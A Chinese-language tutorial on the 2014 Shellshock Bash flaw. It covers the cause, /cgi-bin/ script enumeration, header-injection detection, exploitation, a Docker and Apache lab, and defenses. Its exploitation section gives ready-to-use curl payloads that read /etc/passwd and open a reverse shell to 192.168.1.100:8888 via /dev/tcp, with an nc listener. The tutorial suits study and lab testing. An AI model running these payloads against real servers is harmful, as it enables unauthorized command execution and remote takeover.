Shellshock（破壳漏洞）成因、利用及复现

Shellshock（破壳漏洞）是2014年曝光的高危代码执行漏洞，核心影响GNU Bash环境变量解析逻辑，其中最典型的利用场景是Web服务器的/cgi-bin/目录下的Shell脚本。本文将详细拆解漏洞成因、针对/cgi-bin/目录的利用技巧，并提供从环境搭建到漏洞检测、命令注入的完整复现步骤，帮助全面掌握该漏洞的核心原理与实操方法。

一、Shellshock漏洞基础信息

1.1 漏洞核心概况

• 漏洞编号：核心漏洞（CVE-2014-6271），后续补充/绕过漏洞（CVE-2014-7169、CVE-2014-7186等）

• 影响版本：GNU Bash 1.14 ~ 4.3 之间的所有版本（该区间内默认存在解析缺陷）

• 漏洞类型：环境变量解析命令注入（高危代码执行漏洞，CVSS评分9.8）

• 核心影响场景：依赖Bash解析环境变量的服务，其中最易利用、最常见的是Web服务器（如Apache）的/cgi-bin/目录下的Shell脚本（.sh、.cgi后缀），而.py、.php、.pl、.rb等脚本因不依赖Bash解析环境变量，一般不存在该漏洞。

1.2 漏洞成因（核心解析）

Shellshock的本质是GNU Bash对环境变量的解析存在逻辑边界缺陷，简单来说，就是Bash在解析包含函数定义的环境变量时，会错误执行函数定义之后附加的任意系统命令，具体拆解为两个关键逻辑：

1. 正常逻辑：Bash允许在环境变量中定义Shell函数，格式为变量名='() { 函数体; }'。当Bash启动时，会自动解析这类环境变量，将其注册为可执行的Shell函数，仅执行函数体内部的逻辑，不会解析函数体之外的内容。

2. 漏洞逻辑：有漏洞的Bash版本（1.14~4.3）在解析上述函数格式的环境变量时，没有正确终止函数定义的边界。只要在() { 函数体; }之后添加分号（;）分隔，再附加任意系统命令，Bash会将这些附加命令当作合法系统命令直接执行，而非当作环境变量的普通字符串。

举个本地直观验证示例（需在有漏洞的Bash环境中执行）：

# 1. 定义一个包含函数定义+附加命令的环境变量exportTEST='() { :; }; echo "Shellshock漏洞存在，附加命令被执行"'# 说明：() { :; } 是一个空函数（: 表示空操作，不执行任何逻辑），后面的; echo ... 是附加的命令# 2. 启动新的Bash进程，触发环境变量解析bash# 3. 执行结果：会直接输出"Shellshock漏洞存在，附加命令被执行"# 正常情况下应仅注册空函数，不输出任何内容，此处证明附加命令被错误执行

二、Shellshock漏洞利用（聚焦/cgi-bin/目录）

漏洞利用的核心前提：目标Web服务器存在/cgi-bin/目录，且该目录下有可访问的Shell脚本（.sh、.cgi后缀），同时服务器调用该脚本时使用了有漏洞的Bash版本。利用流程分为三步：爆破目标脚本 → 检测漏洞存在 → 执行注入命令（获取信息/权限）。

2.1 第一步：爆破/cgi-bin/目录下的目标脚本

2.1.1 爆破核心逻辑

Web服务器的/cgi-bin/目录是默认的CGI程序存放目录，CGI程序的核心是通过Web服务器调用外部程序（此处为Shell脚本）并返回结果。我们需要通过爆破，找到该目录下存在的、可访问的Shell脚本（优先级：.sh > .cgi），作为后续漏洞检测和利用的目标。

注意：.py、.php、.pl、.rb等后缀的脚本不依赖Bash解析，无需爆破，一般不存在该漏洞。

2.1.2 两种爆破方式（实操可直接复用）

方式1：手动枚举（简单场景，适合少量测试）

通过curl命令发送HEAD请求（-I参数），判断脚本是否存在（状态码200 OK表示存在且可访问，404 Not Found表示不存在），常用命令示例：

# 枚举常见的.sh后缀脚本curl-I http://target.com/cgi-bin/test.shcurl-I http://target.com/cgi-bin/condor.sh# 示例中的目标脚本curl-I http://target.com/cgi-bin/index.shcurl-I http://target.com/cgi-bin/hello.sh# 枚举常见的.cgi后缀脚本curl-I http://target.com/cgi-bin/test.cgicurl-I http://target.com/cgi-bin/index.cgicurl-I http://target.com/cgi-bin/login.cgi

方式2：工具爆破（高效场景，适合批量枚举，推荐dirb）

dirb是一款常用的Web目录/文件爆破工具，操作简单、效率高，步骤如下：

# 1. 安装dirb（Debian/Ubuntu系统，其他系统可自行适配）aptupdate&&aptinstalldirb -y# 2. 创建自定义爆破字典（仅包含目标后缀，减少无效爆破）# 新建字典文件shellshock_dict.txt，内容如下（可自行补充常见脚本名）cat>shellshock_dict.txt<<EOF test.sh condor.sh index.sh hello.sh test.cgi index.cgi login.cgi EOF# 3. 执行爆破（指定目标URL和字典文件）dirb http://target.com/cgi-bin/ shellshock_dict.txt# 爆破结果解读：显示"200 OK"的条目，即为存在且可访问的Shell脚本

2.2 第二步：检测目标脚本是否存在Shellshock漏洞

2.2.1 核心检测原理

Web服务器在调用/cgi-bin/下的Shell脚本时，会将HTTP请求头（如User-Agent、Referer、Cookie等）转换为以HTTP_开头的环境变量（例如User-Agent请求头会转换为HTTP_USER_AGENT环境变量），并传递给Bash解析。

利用这一特性，我们在HTTP请求头中注入“函数定义+检测命令”，若目标存在漏洞，Bash会解析该环境变量，并执行附加的检测命令，返回检测结果。

2.2.2 实操检测命令（验证有效，可直接复用）

推荐使用curl命令发送请求，以下是核心检测命令（对应示例中的condor.sh脚本），同时补充多种请求头方式（避免部分环境过滤User-Agent）：

# 核心检测命令（使用User-Agent请求头，示例中的命令，验证有效）curl-A'() { :; }; echo; echo; /bin/bash -c "echo shellshock-test-success"'http://target.com/cgi-bin/condor.sh# 命令拆解：# -A：设置User-Agent请求头，注入漏洞利用代码# () { :; }; ：空函数定义，触发Bash的函数解析逻辑# echo; echo; ：输出两个空行，分隔脚本正常输出和注入命令的输出，方便查看结果# /bin/bash -c "echo shellshock-test-success" ：注入的检测命令，执行后输出指定字符串，验证漏洞存在# 补充：其他请求头检测（避免User-Agent被过滤）# 1. 使用Referer请求头curl-H'Referer: () { :; }; echo; echo; /bin/bash -c "echo shellshock-test-success"'http://target.com/cgi-bin/condor.sh# 2. 使用Cookie请求头curl-H'Cookie: test=() { :; }; echo; echo; /bin/bash -c "echo shellshock-test-success"'http://target.com/cgi-bin/condor.sh

2.2.3 检测结果判断

• 漏洞存在：curl响应结果中会出现shellshock-test-success字符串（说明注入的检测命令被成功执行），同时会有两个空行分隔脚本正常输出和检测结果。

• 漏洞不存在：仅返回目标Shell脚本的正常输出（如脚本本身的执行结果），不会出现上述检测字符串，说明Bash版本安全或脚本不是Shell脚本。

2.3 第三步：漏洞利用（注入命令，获取实际权限/信息）

若检测到漏洞存在，可将检测命令替换为实际的攻击命令，实现信息泄露、权限获取等操作（以下命令均基于curl请求头注入，可直接替换检测命令中的注入部分）。

2.3.1 基础利用：获取目标服务器信息

# 1. 查看服务器系统信息（内核版本、操作系统类型）curl-A'() { :; }; echo; echo; /bin/bash -c "uname -a"'http://target.com/cgi-bin/condor.sh# 2. 查看当前执行脚本的用户权限（一般为www-data低权限）curl-A'() { :; }; echo; echo; /bin/bash -c "id"'http://target.com/cgi-bin/condor.sh# 3. 查看/etc/passwd文件（用户列表，敏感信息）curl-A'() { :; }; echo; echo; /bin/bash -c "cat /etc/passwd"'http://target.com/cgi-bin/condor.sh# 4. 查看当前目录下的文件（了解目标脚本所在目录的其他文件）curl-A'() { :; }; echo; echo; /bin/bash -c "ls -l"'http://target.com/cgi-bin/condor.sh

2.3.2 进阶利用：反弹Shell（获取交互式权限）

反弹Shell是最实用的利用方式，可获取目标服务器的交互式Shell，进一步执行任意命令（需攻击者拥有公网服务器，用于监听反弹连接）。

# 步骤1：攻击者公网服务器上监听端口（假设公网IP：192.168.1.100，监听端口：8888）nc-lvvp8888# 监听8888端口，等待目标反弹连接# 步骤2：目标服务器注入反弹Shell命令（替换为公网IP和监听端口）curl-A'() { :; }; echo; echo; /bin/bash -c "bash -i >& /dev/tcp/192.168.1.100/8888 0>&1"'http://target.com/cgi-bin/condor.sh# 反弹成功：攻击者公网服务器的nc监听窗口会出现交互式Shell，可直接执行命令（如whoami、pwd等）

三、Shellshock漏洞复现环境

本节将搭建存在Shellshock漏洞的测试环境（Apache + 有漏洞的Bash + /cgi-bin/Shell脚本），完整复现“爆破→检测→利用”的全流程，确保每一步都可实操、可验证。

3.1 复现环境准备

• 攻击机：Kali Linux（自带curl、dirb、nc工具，无需额外安装）

• 目标机：Ubuntu 14.04（默认搭载GNU Bash 4.3.11，存在Shellshock漏洞；默认搭载Apache服务器，自带/cgi-bin/目录）

• 网络要求：攻击机与目标机可互通（同一局域网或目标机可访问公网）

3.2 目标机环境搭建

Docker 镜像:

# 1. 拉取Docker官方漏洞镜像（ubuntu:14.04，官方原生镜像） docker pull ubuntu:14.04 # 2. 启动容器（挂载本地目录，方便后续操作，同时保留交互终端） docker run -it -v /本地目录:/root/share --name shellshock-test ubuntu:14.04 /bin/bash # 3. 进入容器后，快速验证Shellshock漏洞（核心命令，与本文1.2节本地验证一致） export TEST='() { :; }; echo "Shellshock漏洞存在（Docker镜像验证成功）"' bash # 启动新的Bash进程，触发漏洞 # 验证结果：直接输出上述字符串，说明漏洞存在，镜像可用 # 补充：其他镜像的快速验证（替换镜像名即可） # centos:6 镜像拉取与验证 docker pull centos:6 docker run -it --name shellshock-centos centos:6 /bin/bash export TEST='() { :; }; echo "CentOS 6 镜像漏洞验证成功"' bash # 输出字符串即验证成功 # debian:8 镜像拉取与验证 docker pull debian:8 docker run -it --name shellshock-debian debian:8 /bin/bash export TEST='() { :; }; echo "Debian 8 镜像漏洞验证成功"' bash # 输出字符串即验证成功

配置命令：

# 1. 检查Bash版本（确认存在漏洞）bash--version# 输出版本为4.3.11，属于漏洞影响范围# 2. 安装Apache服务器（自带/cgi-bin/目录）aptupdate&&aptinstallapache2 -y# 3. 启动Apache服务，确认服务正常运行serviceapache2 startpsaux|grepapache2# 查看进程，确认启动成功# 4. 在/cgi-bin/目录下创建测试Shell脚本（condor.sh，示例中的目标脚本）cd/usr/lib/cgi-bin/# Apache默认的/cgi-bin/目录路径vimcondor.sh# 新建脚本，写入以下内容# 脚本内容（简单的Shell脚本，输出当前时间，用于验证脚本可正常执行）#!/bin/bashecho"Content-Type: text/plain"echo""echo"Current Time:$(date)"# 5. 给脚本添加可执行权限（必须，否则Apache无法调用）chmod+x condor.sh# 6. 验证脚本可正常访问（目标机本地访问，或攻击机访问）curlhttp://目标机IP/cgi-bin/condor.sh# 正常返回：Current Time: 具体时间，说明脚本可访问、可执行

四、漏洞防御措施

针对Shellshock漏洞，核心防御思路是修复Bash解析缺陷，同时限制/cgi-bin/目录的风险，具体措施如下：

1. 升级GNU Bash版本：将Bash升级至4.3.25及以上版本（修复了环境变量解析边界缺陷）。

2. 限制/cgi-bin/目录权限：仅允许必要的IP访问/cgi-bin/目录，禁止公网批量访问；删除目录下无用的Shell脚本，仅保留必要的脚本。

3. 替换风险脚本：将/cgi-bin/目录下的.sh、.cgi后缀Shell脚本，替换为不依赖Bash的脚本（如Python脚本），从根源上避免漏洞触发。

4. 过滤HTTP请求头：配置Web服务器（如Apache），过滤HTTP请求头（User-Agent、Referer、Cookie等）中的特殊字符（如()、{}、;等），阻止漏洞利用代码注入。

五、总结

Shellshock漏洞的核心是Bash环境变量解析的逻辑缺陷，其利用的关键场景是Web服务器的/cgi-bin/目录下的Shell脚本（.sh、.cgi后缀），而.py、.php等脚本无此风险。完整利用流程为“爆破目标脚本→检测漏洞存在→注入命令利用”，复现过程中需注意目标机环境搭建的细节（如脚本可执行权限、Apache服务正常运行），以及攻击机与目标机的网络互通。